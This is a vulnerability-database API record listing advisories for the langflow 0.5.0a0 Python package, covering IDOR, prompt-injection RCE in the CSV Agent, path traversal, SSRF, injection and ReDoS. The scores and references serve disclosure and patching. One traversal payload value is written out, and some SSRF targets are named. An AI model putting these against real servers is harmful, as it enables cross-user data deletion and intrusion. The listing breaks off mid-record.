Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:pypi/langflow@0.5.0a0
Typepypi
Namespace
Namelangflow
Version0.5.0a0
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version1.9.1
Latest_non_vulnerable_version1.9.1
Affected_by_vulnerabilities
0
url VCID-1dek-kvzf-27d1
vulnerability_id VCID-1dek-kvzf-27d1
summary 
Langflow: Authenticated Users Can Read, Modify, and Delete Any Flow via Missing Ownership Check
## Vulnerability

### IDOR in `GET/PATCH/DELETE /api/v1/flow/{flow_id}`

The `_read_flow` helper in `src/backend/base/langflow/api/v1/flows.py` branched on the `AUTO_LOGIN` setting to decide whether to filter by `user_id`. When `AUTO_LOGIN` was `False` (i.e., authentication was enabled), neither branch enforced an ownership check — the query returned any flow matching the given UUID regardless of who owned it.

This exposed any authenticated user to:

- **Read** any other user's flow, including embedded plaintext API keys
- **Modify** the logic of another user's AI agents
- **Delete** flows belonging to other users

The vulnerability was introduced by the conditional logic that was meant to accommodate public/example flows (those with `user_id = NULL`) under auto-login mode, but inadvertently left the authenticated path without an ownership filter.

---

## Fix (PR #8956)

The fix removes the `AUTO_LOGIN` conditional entirely and unconditionally scopes the query to the requesting user:

```diff
-    auth_settings = settings_service.auth_settings
-    stmt = select(Flow).where(Flow.id == flow_id)
-    if auth_settings.AUTO_LOGIN:
-        stmt = stmt.where(
-            (Flow.user_id == user_id) | (Flow.user_id == None)  # noqa: E711
-        )
+    stmt = select(Flow).where(Flow.id == flow_id).where(Flow.user_id == user_id)
```

All three operations — read, update, and delete — route through `_read_flow`, so the single change covers the full attack surface. A cross-user isolation test (`test_read_flows_user_isolation`) was added to prevent regression.

---

## Acknowledgements

Langflow thanks the security researcher who responsibly disclosed this vulnerability:

- **[@chximn-dt](https://github.com/chximn-dt)**
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-34046
reference_id
reference_type
scores
0
value 0.00052
scoring_system epss
scoring_elements 0.16672
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-34046
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/pull/8956
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:05Z/
url https://github.com/langflow-ai/langflow/pull/8956
3
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-8c4j-f57c-35cf
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:05Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-8c4j-f57c-35cf
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-34046
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-34046
5
reference_url https://github.com/advisories/GHSA-8c4j-f57c-35cf
reference_id GHSA-8c4j-f57c-35cf
reference_type
scores
url https://github.com/advisories/GHSA-8c4j-f57c-35cf
fixed_packages
0
url pkg:pypi/langflow@1.5.1
purl pkg:pypi/langflow@1.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-bb6r-1f6u-t7ed
5
vulnerability VCID-ncvf-vzqr-uydz
6
vulnerability VCID-q4r1-xjfk-7bg9
7
vulnerability VCID-qwtw-q92t-quhz
8
vulnerability VCID-rc54-gw71-gyau
9
vulnerability VCID-rrva-95s5-kbcf
10
vulnerability VCID-sbea-kkfu-akgb
11
vulnerability VCID-u8mw-7znw-rfab
12
vulnerability VCID-v5pc-pdm9-97g8
13
vulnerability VCID-ypxh-x2hy-3uhb
14
vulnerability VCID-ysnc-jyxb-6qcy
15
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.5.1
aliases CVE-2026-34046, GHSA-8c4j-f57c-35cf
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1dek-kvzf-27d1
1
url VCID-1ynd-c2hz-53hx
vulnerability_id VCID-1ynd-c2hz-53hx
summary 
Langflow has Remote Code Execution in CSV Agent
The CSV Agent node in Langflow hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain’s Python REPL tool (`python_repl_ast`). As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE).
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-27966
reference_id
reference_type
scores
0
value 0.41016
scoring_system epss
scoring_elements 0.97466
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-27966
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/d8c6480daa17b2f2af0b5470cdf5c3d28dc9e508
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-27T14:15:24Z/
url https://github.com/langflow-ai/langflow/commit/d8c6480daa17b2f2af0b5470cdf5c3d28dc9e508
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-27966
reference_id CVE-2026-27966
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-27966
4
reference_url https://github.com/advisories/GHSA-3645-fxcv-hqr4
reference_id GHSA-3645-fxcv-hqr4
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3645-fxcv-hqr4
5
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-3645-fxcv-hqr4
reference_id GHSA-3645-fxcv-hqr4
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-27T14:15:24Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-3645-fxcv-hqr4
fixed_packages
aliases CVE-2026-27966, GHSA-3645-fxcv-hqr4
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1ynd-c2hz-53hx
2
url VCID-2195-gd33-xbdp
vulnerability_id VCID-2195-gd33-xbdp
summary 
Langflow Knowledge Bases API is Vulnerable to Path Traversal
## Summary
Langflow is vulnerable to Path Traversal in the Knowledge Bases API (`DELETE /api/v1/knowledge_bases`). This occurs because user-supplied knowledge base names are concatenated directly into file paths without proper sanitization or boundary validation. An authenticated attacker can exploit this flaw to delete arbitrary directories anywhere on the server's filesystem, leading to data loss and potential service disruption.

## Details
The vulnerability exists in the `delete_knowledge_bases_bulk` function within `src/backend/base/langflow/api/v1/knowledge_bases.py`. 

This function constructs file paths directly from the user-supplied `kb_names` parameter. While other knowledge base endpoints safely route through standard path resolution (e.g., `_resolve_kb_path()`), the bulk delete handler bypasses this entirely. It builds the path manually and passes it directly to `shutil.rmtree()` without validating if the resulting path resolves outside the intended user directory.

## PoC (Proof of Concept)
For the **Bulk Delete** endpoint, an authenticated attacker can supply a traversal sequence in the `kb_names` parameter:
`../victim_user/kb_name`

Because the path is passed directly to `shutil.rmtree()` without containment checks, this payload deletes directories outside the intended scope.

## Impact
Any Langflow instance exposing this endpoint to authenticated users is vulnerable. This exposes the server to:
* **Cross-user data compromise:** Deletion of directories within another tenant's knowledge base space.
* **Arbitrary filesystem manipulation:** Directory deletion at any path on the server where the application has write permissions.
* **Service disruption & Data Loss:** Deletion of critical application files or unrecoverable data loss if backups are co-located on the same filesystem.

## Fixes
The issue was addressed in **PR #12243**, which applies `Path.resolve()` to normalize the supplied path and validates that it starts with the authenticated user's directory before deletion. Subsequent updates (backported from PR #12337) introduced robust containment checks using `Path.is_relative_to()` to prevent prefix-ambiguity bugs.

## Acknowledgements
Thanks to the security researchers who responsibly disclosed this vulnerability:
* @ddlxstudio
* @nekros1xx
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42048
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.03446
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42048
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:13:40Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42048
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42048
4
reference_url https://github.com/advisories/GHSA-9whx-c884-c68q
reference_id GHSA-9whx-c884-c68q
reference_type
scores
url https://github.com/advisories/GHSA-9whx-c884-c68q
fixed_packages
0
url pkg:pypi/langflow@1.9.0
purl pkg:pypi/langflow@1.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ypxh-x2hy-3uhb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0
aliases CVE-2026-42048, GHSA-9whx-c884-c68q
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2195-gd33-xbdp
3
url VCID-2649-thqq-r3d2
vulnerability_id VCID-2649-thqq-r3d2
summary 
Langflow vulnerable to injection
A vulnerability was detected in langflow-ai langflow up to 1.8.3. The impacted element is the function get_client_ip/install_mcp_config of the file src/backend/base/langflow/api/v1/mcp_projects.py of the component Model Context Protocol Configuration API. Performing a manipulation of the argument X-Forwarded-For results in injection. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-6599
reference_id
reference_type
scores
0
value 0.00053
scoring_system epss
scoring_elements 0.16853
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-6599
1
reference_url https://gist.github.com/chenhouser2025/a909c47316b7a0948ee68c109ab747a3
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR
1
value 6.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
2
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
3
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/
url https://gist.github.com/chenhouser2025/a909c47316b7a0948ee68c109ab747a3
2
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-6599
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-6599
4
reference_url https://vuldb.com/submit/791922
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR
1
value 6.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
2
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
3
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/
url https://vuldb.com/submit/791922
5
reference_url https://vuldb.com/vuln/358234
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR
1
value 6.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
2
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
3
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/
url https://vuldb.com/vuln/358234
6
reference_url https://vuldb.com/vuln/358234/cti
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR
1
value 6.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
2
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
3
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/
url https://vuldb.com/vuln/358234/cti
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
8
reference_url https://github.com/advisories/GHSA-v66p-f7x3-4794
reference_id GHSA-v66p-f7x3-4794
reference_type
scores
url https://github.com/advisories/GHSA-v66p-f7x3-4794
fixed_packages
0
url pkg:pypi/langflow@1.8.4
purl pkg:pypi/langflow@1.8.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2195-gd33-xbdp
1
vulnerability VCID-4swq-hbjm-3ucd
2
vulnerability VCID-q4r1-xjfk-7bg9
3
vulnerability VCID-rrva-95s5-kbcf
4
vulnerability VCID-v5pc-pdm9-97g8
5
vulnerability VCID-ypxh-x2hy-3uhb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.8.4
aliases CVE-2026-6599, GHSA-v66p-f7x3-4794
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2649-thqq-r3d2
4
url VCID-9k4q-zwxf-euh1
vulnerability_id VCID-9k4q-zwxf-euh1
summary 
Inefficient Regular Expression Complexity in langflow
A vulnerability classified as problematic was found in Langflow up to 1.0.18. Affected by this vulnerability is an unknown functionality of the file \src\backend\base\langflow\interface\utils.py of the component HTTP POST Request Handler. The manipulation of the argument remaining_text leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-9277
reference_id
reference_type
scores
0
value 0.0017
scoring_system epss
scoring_elements 0.38017
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-9277
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/blob/main/src/backend/base/langflow/interface/utils.py#L65
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/blob/main/src/backend/base/langflow/interface/utils.py#L65
3
reference_url https://rumbling-slice-eb0.notion.site/Remote-Redos-in-https-github-com-langflow-ai-langflow-067159ced0d5494e91b06071384969c4?pvs=4
reference_id
reference_type
scores
0
value 2.3
scoring_system cvssv2
scoring_elements AV:A/AC:M/Au:S/C:N/I:N/A:P
1
value 3.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
2
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
3
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/
url https://rumbling-slice-eb0.notion.site/Remote-Redos-in-https-github-com-langflow-ai-langflow-067159ced0d5494e91b06071384969c4?pvs=4
4
reference_url https://vuldb.com/?ctiid.278659
reference_id
reference_type
scores
0
value 2.3
scoring_system cvssv2
scoring_elements AV:A/AC:M/Au:S/C:N/I:N/A:P
1
value 3.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
2
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
3
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/
url https://vuldb.com/?ctiid.278659
5
reference_url https://vuldb.com/?id.278659
reference_id
reference_type
scores
0
value 2.3
scoring_system cvssv2
scoring_elements AV:A/AC:M/Au:S/C:N/I:N/A:P
1
value 3.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
2
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
3
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/
url https://vuldb.com/?id.278659
6
reference_url https://vuldb.com/?submit.410043
reference_id
reference_type
scores
0
value 2.3
scoring_system cvssv2
scoring_elements AV:A/AC:M/Au:S/C:N/I:N/A:P
1
value 3.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
2
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
3
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/
url https://vuldb.com/?submit.410043
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-9277
reference_id CVE-2024-9277
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-9277
8
reference_url https://github.com/advisories/GHSA-355v-2rjx-fpx7
reference_id GHSA-355v-2rjx-fpx7
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-355v-2rjx-fpx7
fixed_packages
aliases CVE-2024-9277, GHSA-355v-2rjx-fpx7
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9k4q-zwxf-euh1
5
url VCID-bb6r-1f6u-t7ed
vulnerability_id VCID-bb6r-1f6u-t7ed
summary 
Langflow vulnerable to Server-Side Request Forgery
**Vulnerability Overview**


Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result.

Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible—accessing internal resources from the server’s network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks.

**Vulnerable Code**

1. When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-68477
reference_id
reference_type
scores
0
value 0.00027
scoring_system epss
scoring_elements 0.0811
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-68477
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-68477
reference_id CVE-2025-68477
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-68477
3
reference_url https://github.com/advisories/GHSA-5993-7p27-66g5
reference_id GHSA-5993-7p27-66g5
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5993-7p27-66g5
4
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5
reference_id GHSA-5993-7p27-66g5
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-19T17:23:37Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5
fixed_packages
0
url pkg:pypi/langflow@1.7.1
purl pkg:pypi/langflow@1.7.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
